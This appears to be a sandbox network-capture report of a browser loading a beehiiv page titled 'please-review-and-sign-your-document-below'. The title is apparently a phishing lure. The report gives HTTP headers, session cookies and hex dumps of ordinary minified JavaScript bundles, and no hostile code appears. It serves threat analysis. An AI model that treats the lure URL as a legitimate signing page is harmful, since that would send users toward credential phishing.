                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 3d 74 2e 73 70 61 6e 43 6f 6e 74 65 78 74 28 29 2c 6f 3d 66 65 28 74 29 2c 69 3d 55 28 74 29 2c 61 3d 69 3d 3d 3d 74 2c 63 3d 60 5b 54 72 61 63 69 6e 67 5d 20 53 74 61 72 74 69 6e 67 20 24 7b 6f 3f 22 73 61 6d 70 6c 65 64 22 3a 22 75 6e 73 61 6d 70 6c 65 64 22 7d 20 24 7b 61 3f 22 72 6f 6f 74 20 22 3a 22 22 7d 73 70 61 6e 60 2c 75 3d 5b 60 6f 70 3a 20 24 7b 6e 7d 60 2c 60 6e 61 6d 65 3a 20 24 7b 65 7d 60 2c 60 49 44 3a 20 24 7b 73 7d 60 5d 3b 69 66 28 72 26 26 75 2e 70 75 73 68 28 60 70 61 72 65 6e 74 20 49 44 3a 20 24 7b 72 7d 60 29 2c 21 61 29 7b 63 6f 6e 73 74 7b 6f 70 3a 64 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6c 7d 3d 62 28 69 29 3b 75 2e 70 75 73 68 28 60 72 6f 6f 74 20 49 44 3a 20 24 7b 69 2e 73 70 61 6e 43 6f 6e 74 65 78 74 28 29 2e 73 70 61 6e
                                                                                                                                            Data Ascii: =t.spanContext(),o=fe(t),i=U(t),a=i===t,c=`[Tracing] Starting ${o?"sampled":"unsampled"} ${a?"root ":""}span`,u=[`op: ${n}`,`name: ${e}`,`ID: ${s}`];if(r&&u.push(`parent ID: ${r}`),!a){const{op:d,description:l}=b(i);u.push(`root ID: ${i.spanContext().span


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            27192.168.2.1649743104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC840OUTGET /assets/index-CqJN8iQq.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 11350
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2c56-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89e4b970f81-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 61 62 35 62 61 66 30 2d 30 36 64 31 2d 35 31 36 63 2d 62 31 33 62 2d 37 31 38 65 35 30 30 31 39 39 65 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1ab5baf0-06d1-516c-b13b-718e500199e0")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 29 2c 7b 69 6e 6e 65 72 48 54 4d 4c 3a 22 20 22 2c 69 64 3a 22 5f 67 6f 6f 62 65 72 22 7d 29 29 2e 66 69 72 73 74 43 68 69 6c 64 3a 74 7c 7c 53 2c 48 3d 2f 28 3f 3a 28 5b 5c 75 30 30 38 30 2d 5c 75 46 46 46 46 5c 77 2d 25 40 5d 2b 29 20 2a 3a 3f 20 2a 28 5b 5e 7b 3b 5d 2b 3f 29 3b 7c 28 5b 5e 3b 7d 7b 5d 2a 3f 29 20 2a 7b 29 7c 28 7d 5c 73 2a 29 2f 67 2c 4c 3d 2f 5c 2f 5c 2a 5b 5e 5d 2a 3f 5c 2a 5c 2f 7c 20 20 2b 2f 67 2c 44 3d 2f 5c 6e 2b 2f 67 2c 62 3d 28 74 2c 65 29 3d 3e 7b 6c 65 74 20 61 3d 22 22 2c 73 3d 22 22 2c 6f 3d 22 22 3b 66 6f 72 28 6c 65 74 20 72 20 69 6e 20 74 29 7b 6c 65 74 20 6e 3d 74 5b 72 5d 3b 72 5b 30 5d 3d 3d 22 40 22 3f 72 5b 31 5d 3d 3d 22 69 22 3f 61 3d 72 2b 22 20 22 2b 6e
                                                                                                                                            Data Ascii: ateElement("style")),{innerHTML:" ",id:"_goober"})).firstChild:t||S,H=/(?:([\u0080-\uFFFF\w-%@]+) *:? *([^{;]+?);|([^;}{]*?) *{)|(}\s*)/g,L=/\/\*[^]*?\*\/| +/g,D=/\n+/g,b=(t,e)=>{let a="",s="",o="";for(let r in t){let n=t[r];r[0]=="@"?r[1]=="i"?a=r+" "+n
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 21 31 3f 22 22 3a 69 7d 72 65 74 75 72 6e 20 73 2b 6f 2b 28 6e 3f 3f 22 22 29 7d 2c 22 22 29 3b 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 6c 65 74 20 65 3d 74 68 69 73 7c 7c 7b 7d 2c 61 3d 74 2e 63 61 6c 6c 3f 74 28 65 2e 70 29 3a 74 3b 72 65 74 75 72 6e 20 55 28 61 2e 75 6e 73 68 69 66 74 3f 61 2e 72 61 77 3f 52 28 61 2c 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 65 2e 70 29 3a 61 2e 72 65 64 75 63 65 28 28 73 2c 6f 29 3d 3e 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 73 2c 6f 26 26 6f 2e 63 61 6c 6c 3f 6f 28 65 2e 70 29 3a 6f 29 2c 7b 7d 29 3a 61 2c 5f 28 65 2e 74 61 72 67 65 74 29 2c 65 2e 67 2c 65 2e 6f 2c 65 2e 6b 29 7d 6c 65 74 20 4d 2c 49 2c 4e 3b 41 2e 62 69 6e 64 28 7b 67 3a 31 7d 29 3b 6c 65 74 20 68 3d 41 2e
                                                                                                                                            Data Ascii: !1?"":i}return s+o+(n??"")},"");function A(t){let e=this||{},a=t.call?t(e.p):t;return U(a.unshift?a.raw?R(a,[].slice.call(arguments,1),e.p):a.reduce((s,o)=>Object.assign(s,o&&o.call?o(e.p):o),{}):a,_(e.target),e.g,e.o,e.k)}let M,I,N;A.bind({g:1});let h=A.
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2e 69 64 29 7d 29 2c 7b 2e 2e 2e 74 2c 74 6f 61 73 74 73 3a 74 2e 74 6f 61 73 74 73 2e 6d 61 70 28 72 3d 3e 72 2e 69 64 3d 3d 3d 73 7c 7c 73 3d 3d 3d 76 6f 69 64 20 30 3f 7b 2e 2e 2e 72 2c 76 69 73 69 62 6c 65 3a 21 31 7d 3a 72 29 7d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 65 2e 74 6f 61 73 74 49 64 3d 3d 3d 76 6f 69 64 20 30 3f 7b 2e 2e 2e 74 2c 74 6f 61 73 74 73 3a 5b 5d 7d 3a 7b 2e 2e 2e 74 2c 74 6f 61 73 74 73 3a 74 2e 74 6f 61 73 74 73 2e 66 69 6c 74 65 72 28 72 3d 3e 72 2e 69 64 21 3d 3d 65 2e 74 6f 61 73 74 49 64 29 7d 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 70 61 75 73 65 64 41 74 3a 65 2e 74 69 6d 65 7d 3b 63 61 73 65 20 36 3a 6c 65 74 20 6f 3d 65 2e 74 69 6d 65 2d 28 74 2e 70 61 75 73 65 64 41 74 7c 7c 30 29 3b 72 65 74
                                                                                                                                            Data Ascii: .id)}),{...t,toasts:t.toasts.map(r=>r.id===s||s===void 0?{...r,visible:!1}:r)};case 4:return e.toastId===void 0?{...t,toasts:[]}:{...t,toasts:t.toasts.filter(r=>r.id!==e.toastId)};case 5:return{...t,pausedAt:e.time};case 6:let o=e.time-(t.pausedAt||0);ret
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2e 63 61 74 63 68 28 6f 3d 3e 7b 75 2e 65 72 72 6f 72 28 6a 28 65 2e 65 72 72 6f 72 2c 6f 29 2c 7b 69 64 3a 73 2c 2e 2e 2e 61 2c 2e 2e 2e 61 3f 2e 65 72 72 6f 72 7d 29 7d 29 2c 74 7d 3b 76 61 72 20 58 3d 28 74 2c 65 29 3d 3e 7b 78 28 7b 74 79 70 65 3a 31 2c 74 6f 61 73 74 3a 7b 69 64 3a 74 2c 68 65 69 67 68 74 3a 65 7d 7d 29 7d 2c 4b 3d 28 29 3d 3e 7b 78 28 7b 74 79 70 65 3a 35 2c 74 69 6d 65 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 29 7d 2c 74 74 3d 74 3d 3e 7b 6c 65 74 7b 74 6f 61 73 74 73 3a 65 2c 70 61 75 73 65 64 41 74 3a 61 7d 3d 56 28 74 29 3b 63 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6e 3d 65 2e 6d 61 70 28 69 3d 3e 7b 69 66 28 69 2e 64 75 72 61 74 69 6f 6e
                                                                                                                                            Data Ascii: .catch(o=>{u.error(j(e.error,o),{id:s,...a,...a?.error})}),t};var X=(t,e)=>{x({type:1,toast:{id:t,height:e}})},K=()=>{x({type:5,time:Date.now()})},tt=t=>{let{toasts:e,pausedAt:a}=V(t);c.useEffect(()=>{if(a)return;let r=Date.now(),n=e.map(i=>{if(i.duration
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 7c 22 23 66 66 34 62 34 62 22 7d 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 65 74 7d 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 37 35 2c 20 30 2e 38 38 35 2c 20 30 2e 33 32 2c 20 31 2e 32 37 35 29 0a 20 20 20 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 30 30 6d 73 3b 0a 0a 20 20 26 3a 61 66 74 65 72 2c 0a 20 20 26 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 61 74 7d 20 30 2e 31 35 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b
                                                                                                                                            Data Ascii: |"#ff4b4b"}; position: relative; transform: rotate(45deg); animation: ${et} 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275) forwards; animation-delay: 100ms; &:after, &:before { content: ''; animation: ${at} 0.15s ease-out forwards;
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 69 6f 6e 3a 20 24 7b 6e 74 7d 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 37 35 2c 20 30 2e 38 38 35 2c 20 30 2e 33 32 2c 20 31 2e 32 37 35 29 0a 20 20 20 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 30 30 6d 73 3b 0a 20 20 26 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 6c 74 7d 20 30 2e 32 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 32 30 30 6d 73 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                            Data Ascii: ion: ${nt} 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275) forwards; animation-delay: 100ms; &:after { content: ''; box-sizing: border-box; animation: ${lt} 0.2s ease-out forwards; opacity: 0; animation-delay: 200ms; position:
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2c 2d 31 70 78 29 20 73 63 61 6c 65 28 31 29 3b 20 6f 70 61 63 69 74 79 3a 31 3b 7d 0a 31 30 30 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 24 7b 74 2a 2d 31 35 30 7d 25 2c 2d 31 70 78 29 20 73 63 61 6c 65 28 2e 36 29 3b 20 6f 70 61 63 69 74 79 3a 30 3b 7d 0a 60 2c 68 74 3d 22 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 20 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 22 2c 62 74 3d 22 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 20 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 22 2c 76 74 3d 76 28 22 64 69 76 22 29 60 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 63 6f 6c 6f
                                                                                                                                            Data Ascii: ,-1px) scale(1); opacity:1;}100% {transform: translate3d(0,${t*-150}%,-1px) scale(.6); opacity:0;}`,ht="0%{opacity:0;} 100%{opacity:1;}",bt="0%{opacity:1;} 100%{opacity:0;}",vt=v("div")` display: flex; align-items: center; background: #fff; colo
                                                                                                                                            2025-01-15 18:14:34 UTC1312INData Raw: 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 69 29 2e 6f 62 73 65 72 76 65 28 6e 2c 7b 73 75 62 74 72 65 65 3a 21 30 2c 63 68 69 6c 64 4c 69 73 74 3a 21 30 2c 63 68 61 72 61 63 74 65 72 44 61 74 61 3a 21 30 7d 29 7d 7d 2c 5b 74 2c 73 5d 29 3b 72 65 74 75 72 6e 20 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 72 65 66 3a 72 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 73 74 79 6c 65 3a 61 7d 2c 6f 29 7d 2c 6b 74 3d 28 74 2c 65 29 3d 3e 7b 6c 65 74 20 61 3d 74 2e 69 6e 63 6c 75 64 65 73 28 22 74 6f 70 22 29 2c 73 3d 61 3f 7b 74 6f 70 3a 30 7d 3a 7b 62 6f 74 74 6f 6d 3a 30 7d 2c 6f 3d 74 2e 69 6e 63 6c 75 64 65 73 28 22 63 65 6e 74 65 72 22 29 3f 7b 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 3a 74 2e 69 6e
                                                                                                                                            Data Ascii: MutationObserver(i).observe(n,{subtree:!0,childList:!0,characterData:!0})}},[t,s]);return c.createElement("div",{ref:r,className:e,style:a},o)},kt=(t,e)=>{let a=t.includes("top"),s=a?{top:0}:{bottom:0},o=t.includes("center")?{justifyContent:"center"}:t.in


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            28192.168.2.1649741104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC847OUTGET /assets/StatusInputs-JkVhk_jg.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 654
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"28e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89e4a644384-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 33 61 34 63 39 34 37 2d 65 37 36 36 2d 35 62 61 31 2d 39 31 39 34 2d 37 30 32 34 37 64 31 32 32 61 35 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43a4c947-e766-5ba1-9194-70247d122a50")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC196INData Raw: 75 65 3a 74 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 60 24 7b 73 7d 5f 73 75 63 63 65 73 73 5f 6d 65 73 73 61 67 65 60 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 72 7d 29 5d 7d 29 3b 65 78 70 6f 72 74 7b 61 20 61 73 20 53 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 53 74 61 74 75 73 49 6e 70 75 74 73 2d 4a 6b 56 68 6b 5f 6a 67 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 34 33 61 34 63 39 34 37 2d 65 37 36 36 2d 35 62 61 31 2d 39 31 39 34 2d 37 30 32 34 37 64 31 32 32 61 35 30 0a
                                                                                                                                            Data Ascii: ue:t}),e.jsx("input",{hidden:!0,name:`${s}_success_message`,defaultValue:r})]});export{a as S};//# sourceMappingURL=StatusInputs-JkVhk_jg.js.map//# debugId=43a4c947-e766-5ba1-9194-70247d122a50


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            29192.168.2.1649742104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC552OUTGET /assets/i18next-BV1g0mjb.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC899INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 49198
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"c02e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89e4e55432b-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC470INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 62 62 31 62 36 30 33 2d 39 30 39 63 2d 35 36 62 35 2d 62 33 33 66 2d 63 66 63 38 33 35 31 65 61 63 61 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1bb1b603-909c-56b5-b33f-cfc8351eacac")}catch(
